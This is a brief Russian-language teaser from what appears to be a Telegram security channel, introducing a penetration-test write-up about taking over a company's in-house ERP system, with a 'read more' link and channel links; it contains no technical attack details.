В область тес­тирова­ния вхо­дила кор­поратив­ная ERP-сис­тема, при­чем это был даже не вен­дор­ский про­дукт, а внут­ренняя раз­работ­ка. Самопис­ные решения (еще и для внут­ренне­го исполь­зования) осо­бен­но инте­рес­ны тем, что к ним могут предъ­являть­ся гораз­до менее стро­гие тре­бова­ния по безопас­ности. Веро­ятность того, что такие сис­темы про­ходят регуляр­ный пен­тест, тем более мала. Собс­твен­но, о зах­вате этой сис­темы я сегод­ня и рас­ска­жу.

🔓 Читать далее

🌚 @poxek | 🌚 Блог | 📺 poxek_official/videos">YT | 📺 RT | 📺 poxek_official">VK | 🌚 Мерч

Читать полностью…
Subscribe to a channel